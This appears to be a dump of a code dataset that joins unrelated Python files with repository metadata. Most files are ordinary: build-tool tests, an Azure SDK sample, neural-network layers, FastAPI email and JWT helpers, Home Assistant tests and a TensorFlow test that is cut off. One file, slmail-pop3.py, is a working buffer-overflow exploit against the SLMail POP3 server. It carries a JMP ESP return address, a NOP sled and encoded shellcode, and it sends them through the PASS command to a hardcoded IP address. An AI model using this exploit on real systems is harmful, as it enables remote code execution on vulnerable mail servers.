dependencies=['src/python/foo/bar:bar2'],
provides=setup_py(name='foo3', version='3.4.5'),
)
"""
),
)
self.assert_is_owner("src/python/foo/bar:bar1", "src/python/foo/bar:bar1")
self.assert_is_owner("src/python/foo/bar:bar1", "src/python/foo/bar/baz:baz1")
self.assert_is_owner("src/python/foo:foo1", "src/python/foo:foo1")
self.assert_is_owner("src/python/foo:foo3", "src/python/foo:foo3")
self.assert_is_owner("src/python/foo:foo3", "src/python/foo/bar:bar2")
self.assert_is_owner("src/python/foo:foo3", "src/python/foo/bar:bar-resources")
self.assert_no_owner("src/python/foo:foo2")
self.assert_ambiguous_owner("src/python/foo/bar/baz:baz2")
def test_get_owner_siblings(self) -> None:
self.create_file(
"src/python/siblings/BUILD",
textwrap.dedent(
"""
python_library(name='sibling1', sources=[])
python_library(
name='sibling2',
sources=[],
dependencies=['src/python/siblings:sibling1'],
provides=setup_py(name='siblings', version='2.2.2'),
)
"""
),
)
self.assert_is_owner("src/python/siblings:sibling2", "src/python/siblings:sibling1")
self.assert_is_owner("src/python/siblings:sibling2", "src/python/siblings:sibling2")
def test_get_owner_not_an_ancestor(self) -> None:
self.create_file(
"src/python/notanancestor/aaa/BUILD",
textwrap.dedent(
"""
python_library(name='aaa', sources=[])
"""
),
)
self.create_file(
"src/python/notanancestor/bbb/BUILD",
textwrap.dedent(
"""
python_library(
name='bbb',
sources=[],
dependencies=['src/python/notanancestor/aaa'],
provides=setup_py(name='bbb', version='11.22.33'),
)
"""
),
)
self.assert_no_owner("src/python/notanancestor/aaa")
self.assert_is_owner("src/python/notanancestor/bbb", "src/python/notanancestor/bbb")
def test_get_owner_multiple_ancestor_generations(self) -> None:
self.create_file(
"src/python/aaa/bbb/ccc/BUILD",
textwrap.dedent(
"""
python_library(name='ccc', sources=[])
"""
),
)
self.create_file(
"src/python/aaa/bbb/BUILD",
textwrap.dedent(
"""
python_library(
name='bbb',
sources=[],
dependencies=['src/python/aaa/bbb/ccc'],
provides=setup_py(name='bbb', version='1.1.1'),
)
"""
),
)
self.create_file(
"src/python/aaa/BUILD",
textwrap.dedent(
"""
python_library(
name='aaa',
sources=[],
dependencies=['src/python/aaa/bbb/ccc'],
provides=setup_py(name='aaa', version='2.2.2'),
)
"""
),
)
self.assert_is_owner("src/python/aaa/bbb", "src/python/aaa/bbb/ccc")
self.assert_is_owner("src/python/aaa/bbb", "src/python/aaa/bbb")
self.assert_is_owner("src/python/aaa", "src/python/aaa")
def test_validate_args() -> None:
with pytest.raises(InvalidSetupPyArgs):
validate_args(("bdist_wheel", "upload"))
with pytest.raises(InvalidSetupPyArgs):
validate_args(("sdist", "-d", "new_distdir/"))
with pytest.raises(InvalidSetupPyArgs):
validate_args(("--dist-dir", "new_distdir/", "sdist"))
validate_args(("sdist",))
validate_args(("bdist_wheel", "--foo"))
| [
"[email protected]"
] | |
3144ecf342e1c38eb5c4bcf21135c183e9157eee | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/datashare/azure-mgmt-datashare/generated_samples/provider_share_subscriptions_adjust.py | 496c049f7baa29e25e02b0ee6f7ed8ffa89deaa0 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,824 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.datashare import DataShareManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-datashare
# USAGE
python provider_share_subscriptions_adjust.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = DataShareManagementClient(
credential=DefaultAzureCredential(),
subscription_id="12345678-1234-1234-12345678abc",
)
response = client.provider_share_subscriptions.adjust(
resource_group_name="SampleResourceGroup",
account_name="Account1",
share_name="Share1",
provider_share_subscription_id="4256e2cf-0f82-4865-961b-12f83333f487",
provider_share_subscription={"properties": {"expirationDate": "2020-12-26T22:33:24.5785265Z"}},
)
print(response)
# x-ms-original-file: specification/datashare/resource-manager/Microsoft.DataShare/stable/2020-09-01/examples/ProviderShareSubscriptions_Adjust.json
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
13319f9028ad09f1d990efba329a3d5162550bb6 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/image_classification/CSPResNeXt-50_ID1888_for_PyTorch/timm/models/layers/separable_conv.py | 340f58362031b648a0361ac28d85bde369834876 | [
"LicenseRef-scancode-proprietary-license",
"LGPL-2.0-or-later",
"Apache-2.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"MIT",
"CC-BY-NC-4.0",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 4,530 | py | #
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
""" Depthwise Separable Conv Modules
Basic DWS convs. Other variations of DWS exist with batch norm or activations between the
DW and PW convs such as the Depthwise modules in MobileNetV2 / EfficientNet and Xception.
Hacked together by / Copyright 2020 Ross Wightman
"""
from torch import nn as nn
from .create_conv2d import create_conv2d
from .create_norm_act import convert_norm_act
import torch.npu
import os
NPU_CALCULATE_DEVICE = 0
if os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):
NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))
if torch.npu.current_device() != NPU_CALCULATE_DEVICE:
torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')
class SeparableConvBnAct(nn.Module):
""" Separable Conv w/ trailing Norm and Activation
"""
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
channel_multiplier=1.0, pw_kernel_size=1, norm_layer=nn.BatchNorm2d, act_layer=nn.ReLU,
apply_act=True, drop_block=None):
super(SeparableConvBnAct, self).__init__()
self.conv_dw = create_conv2d(
in_channels, int(in_channels * channel_multiplier), kernel_size,
stride=stride, dilation=dilation, padding=padding, depthwise=True)
self.conv_pw = create_conv2d(
int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)
norm_act_layer = convert_norm_act(norm_layer, act_layer)
self.bn = norm_act_layer(out_channels, apply_act=apply_act, drop_block=drop_block)
@property
def in_channels(self):
return self.conv_dw.in_channels
@property
def out_channels(self):
return self.conv_pw.out_channels
def forward(self, x):
x = self.conv_dw(x)
x = self.conv_pw(x)
if self.bn is not None:
x = self.bn(x)
return x
class SeparableConv2d(nn.Module):
""" Separable Conv
"""
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
channel_multiplier=1.0, pw_kernel_size=1):
super(SeparableConv2d, self).__init__()
self.conv_dw = create_conv2d(
in_channels, int(in_channels * channel_multiplier), kernel_size,
stride=stride, dilation=dilation, padding=padding, depthwise=True)
self.conv_pw = create_conv2d(
int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)
@property
def in_channels(self):
return self.conv_dw.in_channels
@property
def out_channels(self):
return self.conv_pw.out_channels
def forward(self, x):
x = self.conv_dw(x)
x = self.conv_pw(x)
return x
| [
"[email protected]"
] | |
3459276818ce07479d8a250a648e51b33e116764 | c9ca065c2674ca30c12a90ceab88ac5798646473 | /weather/weather.py | 0911597edd9300a64cc9034898c72555e919512b | [] | no_license | mshazman/data_munging | beaa389ad3de48d52f1f2ef03ed4ba7f04c77698 | f4f815a896f8f7a6957ebbb22369dd760e95072e | refs/heads/master | 2020-07-23T17:03:01.970331 | 2019-09-10T19:07:20 | 2019-09-10T19:07:20 | 207,640,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 590 | py | """This Module have class to perform all calculation realted to weather"""
import calculation
class WeatherCalculation(calculation.Computation):
"""class object takes data in form of dictionary and apply functions on it"""
def __init__(self, weather_data):
self.weather_data = weather_data
def min_spread_day(self):
"""Function Return day on with temp diffrence is minimum"""
min_value = self.compute_min_value(self.weather_data)
min_value_key = self.compute_min_value_key(min_value, self.weather_data)
return min_value, min_value_key
| [
"="
] | = |
dbce7481439b0de5401a7b81de4c4d300404aa6b | 6388104b646b304a081985216ad2f82f09db2af3 | /slmail-pop3.py | 67f374a5ffac594a45f6cfba7a7c22230d03e945 | [] | no_license | war4uthor/CVE-2003-0264 | 73bd207d3f989434be942982d344285633f6fc48 | 82352386a3e740db37f84ebbaed2632965c4c0a8 | refs/heads/master | 2020-04-12T12:41:00.763220 | 2018-12-19T22:50:30 | 2018-12-19T22:50:30 | 162,499,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,955 | py | #!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 5F4A358F FFE4 JMP ESP
shellcode = (
"\xb8\x9a\x26\x16\x98\xd9\xcd\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x83\xea\xfc\x31\x42\x0e\x03\xd8\x28\xf4\x6d\x20\xdc\x7a"
"\x8d\xd8\x1d\x1b\x07\x3d\x2c\x1b\x73\x36\x1f\xab\xf7\x1a\xac"
"\x40\x55\x8e\x27\x24\x72\xa1\x80\x83\xa4\x8c\x11\xbf\x95\x8f"
"\x91\xc2\xc9\x6f\xab\x0c\x1c\x6e\xec\x71\xed\x22\xa5\xfe\x40"
"\xd2\xc2\x4b\x59\x59\x98\x5a\xd9\xbe\x69\x5c\xc8\x11\xe1\x07"
"\xca\x90\x26\x3c\x43\x8a\x2b\x79\x1d\x21\x9f\xf5\x9c\xe3\xd1"
"\xf6\x33\xca\xdd\x04\x4d\x0b\xd9\xf6\x38\x65\x19\x8a\x3a\xb2"
"\x63\x50\xce\x20\xc3\x13\x68\x8c\xf5\xf0\xef\x47\xf9\xbd\x64"
"\x0f\x1e\x43\xa8\x24\x1a\xc8\x4f\xea\xaa\x8a\x6b\x2e\xf6\x49"
"\x15\x77\x52\x3f\x2a\x67\x3d\xe0\x8e\xec\xd0\xf5\xa2\xaf\xbc"
"\x3a\x8f\x4f\x3d\x55\x98\x3c\x0f\xfa\x32\xaa\x23\x73\x9d\x2d"
"\x43\xae\x59\xa1\xba\x51\x9a\xe8\x78\x05\xca\x82\xa9\x26\x81"
"\x52\x55\xf3\x06\x02\xf9\xac\xe6\xf2\xb9\x1c\x8f\x18\x36\x42"
"\xaf\x23\x9c\xeb\x5a\xde\x77\x1e\x90\xe0\xd7\x76\xa4\xe0\xd6"
"\x3d\x21\x06\xb2\x51\x64\x91\x2b\xcb\x2d\x69\xcd\x14\xf8\x14"
"\xcd\x9f\x0f\xe9\x80\x57\x65\xf9\x75\x98\x30\xa3\xd0\xa7\xee"
"\xcb\xbf\x3a\x75\x0b\xc9\x26\x22\x5c\x9e\x99\x3b\x08\x32\x83"
"\x95\x2e\xcf\x55\xdd\xea\x14\xa6\xe0\xf3\xd9\x92\xc6\xe3\x27"
"\x1a\x43\x57\xf8\x4d\x1d\x01\xbe\x27\xef\xfb\x68\x9b\xb9\x6b"
"\xec\xd7\x79\xed\xf1\x3d\x0c\x11\x43\xe8\x49\x2e\x6c\x7c\x5e"
"\x57\x90\x1c\xa1\x82\x10\x3c\x40\x06\x6d\xd5\xdd\xc3\xcc\xb8"
"\xdd\x3e\x12\xc5\x5d\xca\xeb\x32\x7d\xbf\xee\x7f\x39\x2c\x83"
"\x10\xac\x52\x30\x10\xe5")
buffer = "A"*2606 +"\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode + "C"*(3500-2606-4-351-16)
try:
print "\nSending evil buffer..."
s.connect(('10.11.25.84', 110))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not connect to POP3!"
| [
"[email protected]"
] | |
dcfd08920d5d8dc25f09f1674d7a69c10ecedbb1 | 1bed2f766620acf085ed2d7fd3e354a3482b8960 | /tests/components/sensibo/test_entity.py | 818d9ddb92499f60c743ebd9a3a8e50177e03817 | [
"Apache-2.0"
] | permissive | elupus/home-assistant | 5cbb79a2f25a2938a69f3988534486c269b77643 | 564150169bfc69efdfeda25a99d803441f3a4b10 | refs/heads/dev | 2023-08-28T16:36:04.304864 | 2022-09-16T06:35:12 | 2022-09-16T06:35:12 | 114,460,522 | 2 | 2 | Apache-2.0 | 2023-02-22T06:14:54 | 2017-12-16T12:50:55 | Python | UTF-8 | Python | false | false | 2,826 | py | """The test for the sensibo entity."""
from __future__ import annotations
from unittest.mock import patch
from pysensibo.model import SensiboData
import pytest
from homeassistant.components.climate.const import (
ATTR_FAN_MODE,
DOMAIN as CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
)
from homeassistant.components.sensibo.const import SENSIBO_ERRORS
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ATTR_ENTITY_ID
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import device_registry as dr, entity_registry as er
async def test_entity(
hass: HomeAssistant, load_int: ConfigEntry, get_data: SensiboData
) -> None:
"""Test the Sensibo climate."""
state1 = hass.states.get("climate.hallway")
assert state1
dr_reg = dr.async_get(hass)
dr_entries = dr.async_entries_for_config_entry(dr_reg, load_int.entry_id)
dr_entry: dr.DeviceEntry
for dr_entry in dr_entries:
if dr_entry.name == "Hallway":
assert dr_entry.identifiers == {("sensibo", "ABC999111")}
device_id = dr_entry.id
er_reg = er.async_get(hass)
er_entries = er.async_entries_for_device(
er_reg, device_id, include_disabled_entities=True
)
er_entry: er.RegistryEntry
for er_entry in er_entries:
if er_entry.name == "Hallway":
assert er_entry.unique_id == "Hallway"
@pytest.mark.parametrize("p_error", SENSIBO_ERRORS)
async def test_entity_failed_service_calls(
hass: HomeAssistant,
p_error: Exception,
load_int: ConfigEntry,
get_data: SensiboData,
) -> None:
"""Test the Sensibo send command with error."""
state = hass.states.get("climate.hallway")
assert state
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
return_value={"result": {"status": "Success"}},
):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] == "low"
with patch(
"homeassistant.components.sensibo.util.SensiboClient.async_set_ac_state_property",
side_effect=p_error,
):
with pytest.raises(HomeAssistantError):
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_FAN_MODE,
{ATTR_ENTITY_ID: state.entity_id, ATTR_FAN_MODE: "low"},
blocking=True,
)
state = hass.states.get("climate.hallway")
assert state.attributes["fan_mode"] == "low"
| [
"[email protected]"
] | |
444fd3d4ecdaaf0e9ceab752d1b0931729f02bbe | 245b92f4140f30e26313bfb3b2e47ed1871a5b83 | /airflow/providers/google_vendor/googleads/v12/errors/types/campaign_feed_error.py | 7a1cbbf42dce80b65a8b1c81159737e23be143fb | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | ephraimbuddy/airflow | 238d6170a0e4f76456f00423124a260527960710 | 3193857376bc2c8cd2eb133017be1e8cbcaa8405 | refs/heads/main | 2023-05-29T05:37:44.992278 | 2023-05-13T19:49:43 | 2023-05-13T19:49:43 | 245,751,695 | 2 | 1 | Apache-2.0 | 2021-05-20T08:10:14 | 2020-03-08T04:28:27 | null | UTF-8 | Python | false | false | 1,509 | py | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="airflow.providers.google_vendor.googleads.v12.errors",
marshal="google.ads.googleads.v12",
manifest={"CampaignFeedErrorEnum",},
)
class CampaignFeedErrorEnum(proto.Message):
r"""Container for enum describing possible campaign feed errors.
"""
class CampaignFeedError(proto.Enum):
r"""Enum describing possible campaign feed errors."""
UNSPECIFIED = 0
UNKNOWN = 1
FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE = 2
CANNOT_CREATE_FOR_REMOVED_FEED = 4
CANNOT_CREATE_ALREADY_EXISTING_CAMPAIGN_FEED = 5
CANNOT_MODIFY_REMOVED_CAMPAIGN_FEED = 6
INVALID_PLACEHOLDER_TYPE = 7
MISSING_FEEDMAPPING_FOR_PLACEHOLDER_TYPE = 8
NO_EXISTING_LOCATION_CUSTOMER_FEED = 9
LEGACY_FEED_TYPE_READ_ONLY = 10
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"[email protected]"
] | |
18d4a948b0ca382c4d01997d274c1deb0cbccddf | b92226895d04b0258981864e8604720de9c09f4d | /src/utils.py | 3200a377f749da6ea1b234e191737060009fa795 | [
"BSD-3-Clause"
] | permissive | aydinmemis/blog_FastAPI | e42a6c4f5a9c64154da0f9a23290c274b305838a | f584634a2cd410904df6a7d9478044d269737a91 | refs/heads/master | 2022-04-06T12:37:59.068303 | 2020-03-11T18:04:14 | 2020-03-11T18:04:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,688 | py | import logging
from datetime import datetime, timedelta
from pathlib import Path
from typing import Optional
import emails
import jwt
from emails.template import JinjaTemplate
from jwt.exceptions import InvalidTokenError
from core import config
password_reset_jwt_subject = "preset"
def send_email(email_to: str, subject_template="", html_template="", environment={}):
assert config.EMAILS_ENABLED, "no provided configuration for email variables"
message = emails.Message(
subject=JinjaTemplate(subject_template),
html=JinjaTemplate(html_template),
mail_from=(config.EMAILS_FROM_NAME, config.EMAILS_FROM_EMAIL),
)
smtp_options = {"host": config.SMTP_HOST, "port": config.SMTP_PORT}
if config.SMTP_TLS:
smtp_options["tls"] = True
if config.SMTP_USER:
smtp_options["user"] = config.SMTP_USER
if config.SMTP_PASSWORD:
smtp_options["password"] = config.SMTP_PASSWORD
response = message.send(to=email_to, render=environment, smtp=smtp_options)
logging.info(f"send email result: {response}")
def send_test_email(email_to: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - Test email"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "test_email.html") as f:
template_str = f.read()
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={"project_name": config.PROJECT_NAME, "email": email_to},
)
def send_reset_password_email(email_to: str, email: str, token: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - Password recovery for user {email}"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "reset_password.html") as f:
template_str = f.read()
if hasattr(token, "decode"):
use_token = token.decode()
else:
use_token = token
server_host = config.SERVER_HOST
link = f"{server_host}/reset-password?token={use_token}"
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={
"project_name": config.PROJECT_NAME,
"username": email,
"email": email_to,
"valid_hours": config.EMAIL_RESET_TOKEN_EXPIRE_HOURS,
"link": link,
},
)
def send_new_account_email(email_to: str, username: str, password: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - New account for user {username}"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "new_account.html") as f:
template_str = f.read()
link = config.SERVER_HOST
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={
"project_name": config.PROJECT_NAME,
"username": username,
"password": password,
"email": email_to,
"link": link,
},
)
def generate_password_reset_token(email):
delta = timedelta(hours=config.EMAIL_RESET_TOKEN_EXPIRE_HOURS)
now = datetime.utcnow()
expires = now + delta
exp = expires.timestamp()
encoded_jwt = jwt.encode(
{"exp": exp, "nbf": now, "sub": password_reset_jwt_subject, "email": email},
config.SECRET_KEY,
algorithm="HS256",
)
return encoded_jwt
def verify_password_reset_token(token) -> Optional[str]:
try:
decoded_token = jwt.decode(token, config.SECRET_KEY, algorithms=["HS256"])
assert decoded_token["sub"] == password_reset_jwt_subject
return decoded_token["email"]
except InvalidTokenError:
return None
| [
"[email protected]"
] | |
f59676ae9eac334e4b46372346f1f0b0d5844c4e | c60c199410289c1d7ec4aea00833b461e1f08f88 | /27-29-nov-2014/day1/stringiter2.py | 027138065a5897ed5823bf0d6c686f23c0a0f2de | [] | no_license | ver007/pythonjumpstart | 66fb111e6af197fad3e853b2c2d712a1b57a7d59 | 5b1f52479abd07456e2da494149e491d398f3b7d | refs/heads/master | 2021-01-21T01:34:35.501870 | 2015-05-13T14:10:13 | 2015-05-13T14:10:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | __author__ = 'ravi'
s = 'aeiou'
i = 1
for char in s:
print "{}".format(char*i)
i += 1
| [
"[email protected]"
] | |
8179861a56b00ea0aae727ab31ba65679ea3dcb6 | 5c0e83b07e01983b064980b805e6067cd1123714 | /rd_caltech.py | 81e59b15ea802ee43b2828b30359ef9bfbe9dc85 | [
"MIT"
] | permissive | zyg11/MTCNN-TF | 750ec7b6533b639deba5126e19a434da615585ac | 4d41c5fd2dc13008d39b868aa2e921a7ff731e10 | refs/heads/master | 2020-08-26T14:24:41.084820 | 2019-04-02T09:02:23 | 2019-04-02T09:02:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,656 | py | #author : lxy
#time: 2018.3.23/ 11:30:00
#tool: python3
#version: 0.1
#modify:
#project: pedestrian detection
################################
import numpy as np
import glob
import os
import argparse
def args():
parser = argparse.ArgumentParser(description="read caltech txt")
parser.add_argument('--dir_in',type=str,default="/home/lxy/Downloads/DataSet/trainval/",\
help='annotation files saved dir ')
parser.add_argument('--out_file',type=str,default='train_caltech.txt',\
help='generated outfiles saved')
return parser.parse_args()
def get_fil():
parm = args()
dir_in = parm.dir_in
out_f = parm.out_file
f_wt = open(out_f,'w')
file_txts = glob.glob(dir_in+'annotations/*.txt')
pass_cnt = 0
for file_item in file_txts:
f_rd = open(file_item,'r')
line_list = f_rd.readlines()
if len(line_list)==0:
f_rd.close()
print("empyt file: ",file_item)
pass_cnt+=1
continue
img_split = file_item.split('/')
img_name = img_split[-1][:-4]
img_lists = glob.glob(dir_in+'images/*')
for img_one in img_lists:
img_lists_split = img_one.split('/')
img_one_name = img_lists_split[-1]
if img_name in img_one_name:
img_name = img_one_name
f_wt.write("{} ".format(img_name))
for line in line_list:
line = line.strip()
f_wt.write("{} ".format(line[1:]))
f_wt.write("\n")
f_rd.close()
f_wt.close()
print("pass ",pass_cnt)
if __name__=="__main__":
get_fil()
| [
"[email protected]"
] | |
f099e8563d50a673936df3dfddd48a1bcda5b76d | 2b3ed6bef2f569448918b8be72c733614c231fce | /hdf5_example.py | dd3342f3c57d95a4688d33cb9ed830c521fb325f | [] | no_license | jackdbd/dask-playground | 8e67024ba60fbac3ff1ad77b94363731c04c0afd | 721bc234eadf13e9ef24173bbbc9a68761bf1a7c | refs/heads/master | 2021-04-25T19:58:47.303280 | 2017-11-01T12:49:00 | 2017-11-01T12:49:00 | 109,123,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 554 | py | import os
import h5py
import numpy as np
import dask.array as da
h5file_path = 'myfile.hdf5'
if os.path.exists(h5file_path):
os.unlink(h5file_path)
# create a continuous uniform distribution between 0.0 and 1.0
arr = np.random.random(size=(10000, 2000))
with h5py.File(h5file_path, 'w') as h5f:
h5f.create_dataset('dataset_1', data=arr)
with h5py.File(h5file_path, 'r') as h5f:
dset = h5f['dataset_1'][:]
x = da.from_array(dset, chunks=(1000, 1000))
result = x.mean().compute()
print(result) # should be pretty clonse to 0.5
| [
"[email protected]"
] | |
e88f9fca86593c9f58548a9b9ee9d1d925f8edac | d3a836353ff223f76fa005215560bb9a0d5e1250 | /tensorflow/python/grappler/layout_optimizer_test.py | d9c1c3ce41aee5a5a8bac5f9dd164771611413de | [
"Apache-2.0"
] | permissive | jhabikal21/tensorflow | 9ee926adc0217aa379202fd5c714b7c03e4514f6 | 98d20962172301385aae694141801a375debd2bc | refs/heads/master | 2021-07-15T20:10:13.666688 | 2021-06-23T11:12:14 | 2021-06-23T11:12:14 | 117,846,715 | 0 | 0 | null | 2018-01-17T14:22:49 | 2018-01-17T14:22:48 | null | UTF-8 | Python | false | false | 45,939 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Grappler LayoutOptimizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import device_properties_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.grappler import cluster as gcluster
from tensorflow.python.grappler import tf_optimizer
from tensorflow.python.layers import convolutional as conv_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import saver as saver_lib
def _weight(shape):
"""Generates a weight of a given shape."""
return random_ops.truncated_normal(shape, seed=0, stddev=0.1)
def _bias(shape):
"""Generates a bias of a given shape."""
return constant_op.constant(0.1, shape=shape)
def _conv2d(x, w):
"""Returns a 2d convolution layer with full stride."""
return nn.conv2d(x, w, strides=[1, 1, 1, 1], padding='SAME')
def _max_pool_2x2(x):
"""Downsamples a feature map by 2X."""
return nn.max_pool(
x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
# Taken from tensorflow/examples/tutorials/mnist/mnist_deep.py
def _two_layer_model(x):
x_image = array_ops.reshape(x, [-1, 28, 28, 1])
w_conv1 = _weight([5, 5, 1, 32])
b_conv1 = _bias([32])
h_conv1 = nn.relu(_conv2d(x_image, w_conv1) + b_conv1)
h_pool1 = _max_pool_2x2(h_conv1)
w_conv2 = _weight([5, 5, 32, 64])
b_conv2 = _bias([64])
h_conv2 = nn.relu(_conv2d(h_pool1, w_conv2) + b_conv2)
h_pool2 = _max_pool_2x2(h_conv2)
return h_pool2
def _model_with_second_port():
random_seed.set_random_seed(0)
